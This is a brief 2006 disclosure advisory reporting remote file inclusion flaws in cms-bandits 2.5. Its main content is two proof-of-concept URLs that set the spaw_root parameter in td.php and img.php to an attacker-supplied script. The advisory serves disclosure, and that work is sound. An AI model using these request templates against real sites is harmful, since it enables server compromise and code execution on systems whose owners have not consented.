cms-bandits 2.5 (spaw_root) Remote File Include Vulnerabilities

2006-06-08 00:00:00

# Author: Federico Fazzi
# Contact: [email protected]
# Date: 08/06/2006, 11:09
# Sinthesis: cms-bandits 2.5, Remote file disclosure
# Product: http://sourceforge.net/projects/cms-bandits

http://[site]/[cms-bandits]/dialogs/td.php?spaw_root=[evil script]
http://[site]/[cms-bandits]/dialogs/img.php?spaw_root=[evil script]

#

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.